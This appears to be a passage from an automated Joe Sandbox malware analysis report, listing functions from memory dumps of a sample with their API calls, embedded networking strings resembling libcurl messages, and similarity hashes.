    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: TFTP response timeout
    • API String ID: 572576967-3820788777
    • Opcode ID: ce026c395a3dd0a9431d05ba66f020ab9d5720801950d8c260e56304bc7b3c87
    • Instruction ID: a7c39f6c3feb9abb295511283de50ba7b179be846246dbc64597754d4b73765d
    • Opcode Fuzzy Hash: ce026c395a3dd0a9431d05ba66f020ab9d5720801950d8c260e56304bc7b3c87
    • Instruction Fuzzy Hash: A3717CB5D04209DBDB50EF58C841BEEB7B6AB05320F208399E5296B3C1D7349A85CFA1
    Function 00636AD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Getcoll
    • String ID: Atn$Atn
    • API String ID: 2952761671-1995442299
    • Opcode ID: 61e58d75ec38c0fcdb1e6693b2d1d12b7b345663633abf307d981c6c55df0a51
    • Instruction ID: 7701e4ff550976e9aeaf15fc36b654919a068bd9cf068857b5b001e69fffccf8
    • Opcode Fuzzy Hash: 61e58d75ec38c0fcdb1e6693b2d1d12b7b345663633abf307d981c6c55df0a51
    • Instruction Fuzzy Hash: 8E51E3719002489BEB08DF68C9447EDFBB2FF45314F24C25CE456AB386D736A986CB90
    Function 006637C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 171COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0066D3E0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
      • Part of subcall function 0066D3E0: __allrem.LIBCMT ref: 0066D454
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
      • Part of subcall function 0066D3E0: @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006638EC
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006639CE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackUnothrow_t@std@@@Vars@8__ehfuncinfo$??2@$CounterPerformanceQuery__allrem
    • String ID: Connection time-out
    • API String ID: 3540432321-165637984
    • Opcode ID: 691c6c940f645abd7e9d3f1874b0b8a98f414edfae55ba4e1b866ebb0360129f
    • Instruction ID: 0e1b99fccd592e0938e59dabfd32e70d4ae7f8882b391b909e3e777fcdac7f0f
    • Opcode Fuzzy Hash: 691c6c940f645abd7e9d3f1874b0b8a98f414edfae55ba4e1b866ebb0360129f
    • Instruction Fuzzy Hash: 6A713DB4A002089FDB08DF58C495BEDBBB6EB88314F10817DE919AB391D775DE81CB94
    Function 0069E220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 162COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0069E290
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E3E9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: Content-Length: %I64d
    • API String ID: 88142382-326554249
    • Opcode ID: 0059f996b7957f8f0e92dfcd7c6854248c7e56a595d6fad06b67c3b7ebb254ac
    • Instruction ID: 14f4253d2c01281943101a7cdbacc65f6764a53a1bc9591de322cdf0fe0b5fba
    • Opcode Fuzzy Hash: 0059f996b7957f8f0e92dfcd7c6854248c7e56a595d6fad06b67c3b7ebb254ac
    • Instruction Fuzzy Hash: C95161B5D00209EFDF10DFA8D881AEEB7BAAF48310F14416DE515B7381D7319A80CBA5
    Function 006D69E1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • ReadFile.KERNEL32(?,00000000,00000002,?,00000000,00000000,00000000,?), ref: 006D6ABF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: FileRead
    • String ID: qm$qm
    • API String ID: 2738559852-672062507
    • Opcode ID: 84857f807ee9055d7542be96dc6182902c50104014a6d14bad9560ce73f33004
    • Instruction ID: 67a430c121d8941aeb0c52ff56591eb2aa74f85273914349a90ccf0cdb2badfa
    • Opcode Fuzzy Hash: 84857f807ee9055d7542be96dc6182902c50104014a6d14bad9560ce73f33004
    • Instruction Fuzzy Hash: 8E51E631E00255EBCB20DF98C891AEDB7B2FF19314F24865BE455EB390E3749A91CB54
    Function 006AA0A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: realm
    • API String ID: 1951014933-4204190682
    • Opcode ID: 68644bf82bb6cc6d1a689952e960b00b26776ed65839112e8ee0125cef1e937a
    • Instruction ID: 5385b514de9a87fb6acf1a17578e96f6a184bbf9b9989491759ff496f64c754c
    • Opcode Fuzzy Hash: 68644bf82bb6cc6d1a689952e960b00b26776ed65839112e8ee0125cef1e937a
    • Instruction Fuzzy Hash: 015183B1900108ABDB14EF94D881BFA77B6AF46355F14C06AE80A8B341D735DF95CF92
    Function 0069F491 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: OS/400$SITE NAMEFMT 1
    • API String ID: 930174750-2049154998
    • Opcode ID: f3bd28cba845703b31a901d5e3a1aa850e5ef234fe77dea20d4d220f6965878a
    • Instruction ID: b68ed56addfc51d4810d39c461410ff81b8ff1c1733cf04b73a7da6d863772de
    • Opcode Fuzzy Hash: f3bd28cba845703b31a901d5e3a1aa850e5ef234fe77dea20d4d220f6965878a
    • Instruction Fuzzy Hash: 2A5190B1E00108DFCF54DF98D885BEEB7B6AF45304F29817AE805AB741DA35AD42CB91
    Function 006970D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: 8$Command failed: %d
    • API String ID: 4218353326-2712634408
    • Opcode ID: 79b95fc7e24bd1e333338c13c67b6fb14ee022bf8d83ac0d1206d46ae121ead5
    • Instruction ID: 3e7b0ecefb7be1aec4b9547d7fc6f8db85627c03e3a4a4ad3178c6588d1e8770
    • Opcode Fuzzy Hash: 79b95fc7e24bd1e333338c13c67b6fb14ee022bf8d83ac0d1206d46ae121ead5
    • Instruction Fuzzy Hash: 66412DB4E14209EFCF04CF98C895BEDB7B6AB45304F18C599E419AB341D3359E41CB55
    Function 0065F2C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F416
      • Part of subcall function 0065F090: @_RTC_CheckStackVars@8.LIBCMT ref: 0065F287
    Strings
    • Connecting to hostname: %s, xrefs: 0065F379
    • Connecting to port: %d, xrefs: 0065F3D7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Connecting to hostname: %s$Connecting to port: %d
    • API String ID: 930174750-219814384
    • Opcode ID: 9a6246d1e36d3155fdd96cc5c3535bfd606261901f1837494b9bd7ccc4d33c0f
    • Instruction ID: e11e62c69e9ce631e226f7cf261a1a38c64f88ed569d149c5ba102c8314e1117
    • Opcode Fuzzy Hash: 9a6246d1e36d3155fdd96cc5c3535bfd606261901f1837494b9bd7ccc4d33c0f
    • Instruction Fuzzy Hash: 76417CB4D00209EFDB04DF98C485BEEBBB6EB08315F1482A9ED199B381D7749A45CBD1
    Function 00694110 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694231
    Strings
    • No known authentication mechanisms supported!, xrefs: 0069420A
    • C, xrefs: 0069421D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: C$No known authentication mechanisms supported!
    • API String ID: 930174750-3113419789
    • Opcode ID: 6b82c300ea109778a5d73c39ec04157f11307a6e00699ae732ae20111305479a
    • Instruction ID: da71a7e75b24379071971cf6d41f7ddbc9e81a025c6a7d62cd182e80b2ef8756
    • Opcode Fuzzy Hash: 6b82c300ea109778a5d73c39ec04157f11307a6e00699ae732ae20111305479a
    • Instruction Fuzzy Hash: 18416AB5D00208EFDF14DF98D852FAE77BAAF44305F108198E405AB345DB31AB82CB94
    Function 006A6B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 006A6BF2
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A6C37
      • Part of subcall function 006BF68C: ___report_securityfailure.LIBCMT ref: 006BF691
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___report_securityfailure_strlen
    • String ID: %d.%d.%d.%d
    • API String ID: 2050149037-3491811756
    • Opcode ID: 6245a1fde09c9169d0d9cc682325b8b79872c0bd89479cd634c66f72781c7b73
    • Instruction ID: 2bb9d11f40c5fb8d83d31432dafcf220fcdfe17f42c06e191bc7d9777f934eab
    • Opcode Fuzzy Hash: 6245a1fde09c9169d0d9cc682325b8b79872c0bd89479cd634c66f72781c7b73
    • Instruction Fuzzy Hash: 5131B0B1D042099FDB44DFA8C851BFE7BF6EB49300F04847DE406EB281EA359A40CBA4
    Function 00691420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00691513
    Strings
    • No known authentication mechanisms supported!, xrefs: 006914EC
    • C, xrefs: 006914FF
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: C$No known authentication mechanisms supported!
    • API String ID: 930174750-3113419789
    • Opcode ID: 0c3fff38504a7fa990ffef7b38c3aa17a5433fbf49179e48309837e1a1c2ecb0
    • Instruction ID: 0b32b4c0f036db76ca9cfcaf1e4eea25b33c9b4122c90ffa7966fb072e6c5ef6
    • Opcode Fuzzy Hash: 0c3fff38504a7fa990ffef7b38c3aa17a5433fbf49179e48309837e1a1c2ecb0
    • Instruction Fuzzy Hash: D23182F5D00209AFCF44DF98D851AAD7BBAAB46305F258099E5099F342E6359B40CB94
    Function 00694950 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694A40
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    • API String ID: 930174750-2942935573
    • Opcode ID: 900422fd92839e6fb4d1a290dc78e9b9fe18c45d56936229265736bc05dfac7b
    • Instruction ID: 264c3000ca35b06fb53497bd26094e404e695267ee860f6e7ca7206aa15f31cc
    • Opcode Fuzzy Hash: 900422fd92839e6fb4d1a290dc78e9b9fe18c45d56936229265736bc05dfac7b
    • Instruction Fuzzy Hash: AE312DB5D04209EFCF40DF98D841BDEB7BAAF48304F10819AE509AB745E6359B42CB95
    Function 0067F2DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88networkCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00662840: @_RTC_CheckStackVars@8.LIBCMT ref: 006628BE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F3D2
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • WSAGetLastError.WS2_32 ref: 0067F2A6
    Strings
    • Q, xrefs: 0067F33C
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F251
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$ErrorLast
    • String ID: Q$schannel: timed out sending data (bytes sent: %zd)
    • API String ID: 936155887-2098164619
    • Opcode ID: 458b0d7a676e818fc75faa85f9e011c0b4afd52c91774dd7d4f427a26913b481
    • Instruction ID: 6807aa1eab89457fd2a56db6dabe8429078cc6d4483861ecdd02aae7e210e017
    • Opcode Fuzzy Hash: 458b0d7a676e818fc75faa85f9e011c0b4afd52c91774dd7d4f427a26913b481
    • Instruction Fuzzy Hash: 77316175A00208DFDB54DFA4D881FED77B6BB48310F20816DE419A7341D731A981CB95
    Function 0069E580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E66E
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • Failed FTP upload: %0d, xrefs: 0069E5B9
    • Data conn was not available immediately, xrefs: 0069E63C
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Data conn was not available immediately$Failed FTP upload: %0d
    • API String ID: 572576967-1224284087
    • Opcode ID: 756de47bb5725b7d791672adc06a7e1ee7beadc395a952a399fa6572fb00c06d
    • Instruction ID: ebeae8155a381e534b881ea57dc364672929cbbe9ea5f679cdc42767e1600100
    • Opcode Fuzzy Hash: 756de47bb5725b7d791672adc06a7e1ee7beadc395a952a399fa6572fb00c06d
    • Instruction Fuzzy Hash: B53191B5E00208EFDF44DFA8D851BEE7BBAAB54704F10816DE909AB741E6359A40CB91
    Function 006B5816 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: =$AQ==
    • API String ID: 930174750-1093747556
    • Opcode ID: 66005f73b2a6cc4e045d450ac2a7eaf19d3fd016e2120b12f2dc8c322a70a6d2
    • Instruction ID: 0b790e0de5882ed84ca14eeafb0f5126a32d2f1b75d4e78341ba1ea78c770735
    • Opcode Fuzzy Hash: 66005f73b2a6cc4e045d450ac2a7eaf19d3fd016e2120b12f2dc8c322a70a6d2
    • Instruction Fuzzy Hash: 4D316FB5A00508EFCB10EF58D885BEE7376AF45310F108118F80AAB351D735AE81CF96
    Function 00692020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006B51C0: @_RTC_CheckStackVars@8.LIBCMT ref: 006B59A8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006920EF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Authentication cancelled$C
    • API String ID: 930174750-2942935573
    • Opcode ID: db09eefce83ec3877af7639a747ff601b515255ef1b09981a74164a0f4dbaebc
    • Instruction ID: f0a1fa307e2e5a818c8b98eee7a803e86b2dcc6ed50151549f88f67f7bc0f78a
    • Opcode Fuzzy Hash: db09eefce83ec3877af7639a747ff601b515255ef1b09981a74164a0f4dbaebc
    • Instruction Fuzzy Hash: 7C31FBB5D00209EFCF44DF98D851AEEB7BAEB44304F20C169E509AB741D6359B41CB95
    Function 006963A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00696463
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • No known authentication mechanisms supported!, xrefs: 0069643C
    • C, xrefs: 0069644F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: C$No known authentication mechanisms supported!
    • API String ID: 1951014933-3113419789
    • Opcode ID: 591f7c1c02efc227cea993d8ce6bfdcf5ddca1c6cd4ecf8456c44c8a9d2e7ff8
    • Instruction ID: 80c2d0574f6e525bb7deb72b24626756d06beea6d1ec6465fce6a910ca4db156
